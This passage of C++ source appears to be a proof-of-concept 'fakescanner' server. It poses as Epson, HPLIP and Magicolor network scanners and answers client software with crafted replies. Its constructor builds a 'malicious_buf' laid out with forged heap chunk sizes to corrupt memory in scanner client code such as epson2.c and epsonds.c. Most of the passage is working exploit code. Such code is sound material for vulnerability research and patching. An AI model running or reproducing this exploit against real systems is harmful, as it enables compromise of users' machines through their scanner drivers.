    mode_(mode), state_(H_wait_hdr), payload_state_(P_normal), cmd_(0)
  {
    size_t size = sizeof(malicious_buf);
    memset(malicious_buf, 0, size-1);
    malicious_buf[size-1] = 0xf0;
    malicious_buf[0] = 'I';
    malicious_buf[1] = 'S';
    *(uint32_t*)&malicious_buf[6] = htonl(size-12);
    // try to recreate the original heap structure by inserting
    // valid-looking chunk sizes at appropriate offsets. (I got
    // these chunk sizes from a debug session in gdb.)
    size_t offset = 12 + 0x220 + 8;
    size_t offsets[] =
      { 0x40, 0x30, 0x20, 0x50, 0x20, 0x800, 0x70, 0x20,
        0xa0, 0x70, 0x20, 0x60, 0x20, 0x20, 0x70, 0x20,
        0x70, 0x20, 0x60, 0x70, 0x20, 0x20, 0x60, 0x70,
        0x30, 0x20, 0x60, 0x30, 0x40, 0x30, 0x30, 0x30,
        0x90, 0 };
    size_t i;
    for (i = 0; offsets[i] != 0; i++ ) {
      *(size_t*)&malicious_buf[offset] = offsets[i] + 5;
      offset += offsets[i];
    }
  }

  virtual ~EpsonHandlerTCP() {}

  virtual ssize_t accept(SocketHandlerTCP& sock) override {
    printf("Sending welcome message.\n");

    // Send back a welcome message. To hit the code in epson2.c, the
    // payload needs to be 5 bytes; to the hit the code in epsonds.c, it
    // needs to be 3 bytes.
    if (mode_ == 0) {
      // Send back a 5-byte payload to hit the code in epson2.c
      const char reply[17] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 5, 0, 0, 'K','E','V','I','N'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    } else {
      const char reply[15] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 'K','E','V'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    }

    state_ = H_wait_hdr;
    return 12;
  }

  virtual ssize_t receive(SocketHandlerTCP& sock, const uint8_t* buf) override {
    switch (state_) {
    case H_wait_hdr:
      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      if ((cmd_ & 0xFF00) == 0x2000) {
        // There will be an extended header.
        state_ = H_wait_extra_hdr;
        return 8;
      }
      buf_size_ = ntohl(*(const uint32_t*)&buf[6]);
      reply_len_ = 0;
      if (buf_size_ == 0 && cmd_ == 0x2100) {
        return net_lock_epson2(sock);
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_extra_hdr:
      buf_size_ = ntohl(*(const uint32_t*)&buf[0]);
      reply_len_ = ntohl(*(const uint32_t*)&buf[4]);
      if (buf_size_ == 0 && payload_state_ == P_img) {
        return send_img_response(sock);
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_moreinfo:
      // This case is triggered if we specified a non-zero "more" value in
      // the initial reply.

      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      buf_size_ = ntohl(*(const uint32_t*)&buf[6]);
      printf("more INFO: %x %x\n", cmd_, buf_size_);
      buf_size_ = ntohl(*(const uint32_t*)&buf[12]);
      reply_len_ = ntohl(*(const uint32_t*)&buf[16]);
      printf("more INFO extra: %x %x\n", buf_size_, reply_len_);

      send_info_harmless(sock, 0);
      state_ = H_wait_hdr;
      return 12;

    case H_wait_payload:
      switch (payload_state_) {
      case P_normal:
        switch (cmd_) {
        case 0x2000: // eds_send
          return eds_send(sock, buf);
        case 0x2100: // net_lock
          return net_lock(sock, buf);
        default:
          printf("Unknown EPSON command: 0x%x\n", cmd_);
          return -1;
        }
      case P_paramblock:
        return send_para_response(sock);
      default:
        printf("Invalid EPSON payload state: %d\n", payload_state_);
        return -1;
      }

    default:
      printf("Invalid EPSON header state: %d\n", state_);
      return -1;
    }
  }

  virtual void disconnect() override {}
};

class BuildEpsonHandlerTCP : public BuildRecvHandlerTCP {
  const int mode_;

public:
  explicit BuildEpsonHandlerTCP(int mode) : mode_(mode) {}

  virtual RecvHandlerTCP* build(sockaddr*, socklen_t) override {
    return new EpsonHandlerTCP(mode_);
  }
};

int main(int argc, char* argv[]) {
  if (argc < 2) {
    const char* prog = argc > 0 ? argv[0] : "fakescanner";
    fprintf(
      stderr,
      "usage: %s <command>\n"
      "commands: hplip [0-2], epson [0-8], magicolor\n",
      prog
    );
    exit(EXIT_FAILURE);
  }

  const char* command = argv[1];

  const int epollfd = epoll_create1(0);
  if (epollfd == -1) {
    fprintf(stderr, "Call to epoll_create1 failed.\n");
    exit(EXIT_FAILURE);
  }

  if (strcmp(command, "magicolor") == 0) {
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(161),
          new SNMPHandlerUDP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 161.\n");
      exit(EXIT_FAILURE);
    }
    if (EpollTcpConnectHandler::build(
          epollfd,
          create_bind_and_listen_tcp(4567),
          new BuildMagicolorHandlerTCP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 4567.\n");
      exit(EXIT_FAILURE);
    }
  } else if (strcmp(command, "hplip") == 0) {
    if (argc != 3) {
      fprintf(
        stderr,
        "usage: %s hplip [0-2]\n"
        "You need to include a mode number.\n",
        argv[0]
      );
      exit(EXIT_FAILURE);
    }
    const int mode = atoi(argv[2]);
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(5353),
          new HplipHandler(mode)) < 0) {
      fprintf(stderr, "Failed to bind UDP port 5353.\n");
      exit(EXIT_FAILURE);
    }
  } else if (strcmp(command, "epson") == 0) {
    if (argc != 3) {
      fprintf(
        stderr,
        "usage: %s epson [0-8]\n"
        "You need to include a mode number.\n",
        argv[0]
      );
      exit(EXIT_FAILURE);
    }
    const int mode = atoi(argv[2]);
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(3289),
          new EpsonHandlerUDP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 3289.\n");
      exit(EXIT_FAILURE);
    }
    if (EpollTcpConnectHandler::build(
          epollfd,
          create_bind_and_listen_tcp(1865),
          new BuildEpsonHandlerTCP(mode)) < 0) {
      fprintf(stderr, "Failed to bind UDP port 1865.\n");
      exit(EXIT_FAILURE);
    }
  } else {
    fprintf(stderr, "Unrecognized command: %s\n", command);
    exit(EXIT_FAILURE);
  }

  while (1) {
    const size_t max_events = 10;
    epoll_event events[max_events];
    const int numevents = epoll_wait(epollfd, events, max_events, -1);
    int eventidx;
    for (eventidx = 0; eventidx < numevents; eventidx++) {
      epoll_event *ev = &events[eventidx];
      EPollHandlerInterface *handler = (EPollHandlerInterface *)ev->data.ptr;

      if (ev->events & (EPOLLERR | EPOLLHUP)) {
        printf("epoll error 0x%x on handler=%p\n", ev->events, handler);
        delete handler;  // This also closes the file descriptor
        continue;
      }

      if (!(ev->events & EPOLLIN)) {
        // No input to process.
        continue;
      }

      if (handler->process_read(ev) < 0) {
        printf("shutdown handler=%p\n", handler);
        delete handler;  // This also closes the file descriptor
        continue;
      }
    }
  }

  return 0;
}
